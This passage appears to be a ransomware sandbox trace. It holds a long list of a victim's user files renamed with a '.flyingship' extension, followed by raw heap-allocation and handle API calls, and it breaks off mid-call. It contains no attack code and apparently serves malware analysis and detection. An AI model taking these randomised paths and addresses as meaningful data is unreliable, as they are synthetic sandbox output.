HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\JLQ6tYmOaaqJ7B5t.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\Kq7hl.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\SEObOseiAS.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\q4eGaKOHIBJ.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\R4ko9W2ZwNtIqWlJH0ER.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s1epd3.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.flyingship.exe\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\TtEAhK_e6.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VLNsdshtM2X.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wE2eF3.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Y8qF6zL.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_IlnDJr.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0-MFkGR.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F8kGUIlkgYER.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Im NPo61DTLm5sBx.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\j0tJZ4pqz2gw.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\k55L_7uM1tYjpSGA.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kQVkybnJLUTO.flyingship.ods\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KuxYygUpCCsKE_KnyRa.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\DS7b8_ Jws.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\gVll7Y--hWx_Sucb_5p.flyingship.ppt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.flyingship.pdf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\oxnDwHiXTyJqTe06unb5.flyingship.xls\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\SSq5T5u.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\uS __ 9ClmNKU6A.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XdF9hOa.flyingship.pdf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.flyingship.pdf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\ZAkF0mR.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LVw QC5rO32Oh.flyingship.pptx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mV3Nzu4vWV4hC.flyingship.xls\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.flyingship.ico\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NqZsz9XCQqe D7p.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.flyingship.ods\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\osHJNd6e0L0ZQQ8NT.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\voeimd@djhreuu.uhd.flyingship.pst\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pwvig6N-.flyingship.xls\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uKjh6aasKg.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\-V0 o3_nR9rc3_2DHH4.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\B1Y6naM2jHwq3MoZolB.flyingship.ots\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\G856.flyingship.ots\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\GvoASfHILqm4y.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\hvT5kT0PFopfwSD QzN.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\1usRK9.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\izNb7DZLOKQSO_3S.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.flyingship.ots\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\vupb0.flyingship.pps\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\YNSVRvaq.flyingship.rtf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\_--jWXD.flyingship.odt\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YCwVOFdIAc7At.flyingship.xlsx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zw2wea8 QxA.flyingship.csv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ZZwMa.flyingship.docx\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3-CH0vN.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\4b9s3WH6aiuJAy85.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\cEm-bR.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\9zmv2.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\cxrsN5DPtYDsIm.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\R64I-TKxh1f.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\Ftar8k3covO_ce7D.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\7iHROd3G.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\KQpDY.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\snzbfu-3Qx.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\LWhz.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\HdCQAGk.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\O8LnB5uJ.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\WWUbMhmKz.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\y3qZNbvqKQ2uR4UOsf8q.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\kDBYwX3doPBMqwfNV.flyingship.m4a\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\ObhGwH4nj0Pk.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\uvLMHuUMLBjPgdhq.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\Xxiiq96uF_.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\V01OknNppjh UAhh.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\OLqMC1.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\tCz4fpeQ.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.flyingship.wav\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\xhgr3.flyingship.mp3\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ggHHL.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\3TvBEt HM8KLbxN.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\8tJ3GTLOl3FHI5E.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\CNlXKQK1zNg.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\EVGfmjA.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Lu YE0Otm8F.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\P8P2Fux.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\qiez.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\QS5wBgJkU5.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\uPfzg.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\f2JFy_.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\tiM2iA.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\_jWe.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ITYvcRMYOFcy 0-.flyingship.png\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oNhYsixG5vZ 1mhk2TaA.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.flyingship.gif\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.flyingship.bmp\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\zvOG.flyingship.jpg\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\-AawcGHZf1n-uzNR9.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\aXsAYPuZRSCYMOeip6.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\IipHJEO8.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0ntYY6p\\sQ9weB5Cn_9JdUcj7P.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\7999fJY.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\GwLjRbpo46x9NeDS.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\CCOSsWXcEV8ZF\\S8EN.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cWKRu.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\sw3Tjl.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\VGkX.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Ffd495B2eqP\\xhiatAIn2v.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\-4jYTdy7DTgQ 7n_RHA.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\g9kkkj.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\c5JuP_Nf8XPMTRuN_.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\0vlShOAoYV07RlGs7cfh.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\93QZ.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\SuitfltgQdh7fZsjOO.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\Op Gi7LiHe dQIhO\\vgCMnA4csdU WVhA.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\NsEh3.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\d8qDzfY_.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z4iUj36y_uRj.flyingship.flv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\448L4fbhgcrO5YwRMWv_.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AcJ9.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.flyingship.mkv\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\c2l5D8zFcQaFr.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\gUuRkOGgEOvL1Ts9uT.flyingship.mp4\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\IoPtJD0U8Gbyjv6.flyingship.swf\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\J9c7.flyingship.avi\r\nC:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\Syi8lj9.flyingship.mkv\r\n") returned 16402 [0248.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4230 | out: hHeap=0xbe0000) returned 1 [0248.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8030) returned 0xe98c18 [0248.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe90be8 | out: hHeap=0xbe0000) returned 1 [0248.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe88bf0 | out: hHeap=0xbe0000) returned 1 [0248.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52720 | out: hHeap=0xbe0000) returned 1 [0248.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4218 | out: hHeap=0xbe0000) returned 1 [0248.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8030) returned 0xe82c00 [0248.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe98c18 | out: hHeap=0xbe0000) returned 1 [0248.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52840 | out: hHeap=0xbe0000) returned 1 [0248.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41b8 | out: hHeap=0xbe0000) returned 1 [0248.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d648 | out: hHeap=0xbe0000) returned 1 [0248.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52730 | out: hHeap=0xbe0000) returned 1 [0248.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41b8 [0248.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52730 [0248.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52730 | out: hHeap=0xbe0000) returned 1 [0248.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8024) returned 0xe8ac38 [0248.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52730 [0248.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xe52840 [0248.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8030) returned 0xe92c68 [0248.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf4218 [0248.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe8ac38 | out: hHeap=0xbe0000) returned 1 [0248.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52730 | out: hHeap=0xbe0000) returned 1 [0248.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe82c00 | out: hHeap=0xbe0000) returned 1 [0248.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe527a0 | out: hHeap=0xbe0000) returned 1 [0248.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4188 | out: hHeap=0xbe0000) returned 1 [0248.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41a0 | out: hHeap=0xbe0000) returned 1 [0248.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf41b8 | out: hHeap=0xbe0000) returned 1 [0248.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe3d5d0 | out: hHeap=0xbe0000) returned 1 [0248.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52790 | out: hHeap=0xbe0000) returned 1 [0248.404] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0248.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xe3d5d0 [0248.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xdf41b8 [0248.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xe52790 [0248.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52790 | out: hHeap=0xbe0000) returned 1 [0248.404] CloseHandle (hObject=0x5fc) returned 1 [0248.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf4260 | out: hHeap=0xbe0000) returned 1 [0248.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52780 | out: hHeap=0xbe0000) returned 1 [0248.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe6abc0 | out: hHeap=0xbe0000) returned 1 [0248.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe33dd0 | out: hHeap=0xbe0000) returned 1 [0248.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xdf40c8 | out: hHeap=0xbe0000) returned 1 [0248.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xe52770 | out: 